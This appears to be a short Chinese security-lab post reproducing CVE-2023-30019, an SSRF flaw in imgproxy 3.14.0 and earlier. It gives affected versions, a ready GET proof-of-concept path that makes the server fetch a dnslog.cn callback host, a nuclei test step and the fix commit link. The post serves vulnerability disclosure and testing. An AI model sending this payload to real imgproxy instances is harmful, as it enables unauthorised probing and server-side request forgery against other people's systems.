本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
imgproxy 3.14.0版本及之前版本存在安全漏洞,由于缺乏对 imageURL 参数的清理,容易受到服务器端请求伪造 (SSRF) 的攻击。
imgproxy <=3.14.0
2.对漏洞进行复现
POC (GET)
/111/rs:fit:400:400:0:0/plain/http://dvxrhi.dnslog.cn
漏洞复现
GET请求,ndslog测试存在漏洞
3.nuclei测试(漏洞存在)
https://github.com/imgproxy/imgproxy/commit/1a9768a2c682e88820064aa3d9a05ea234ff3cc4
原文始发于微信公众号(弥天安全实验室):Imgproxy服务器端请求伪造漏洞(CVE-2023-30019)【SSRF】
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论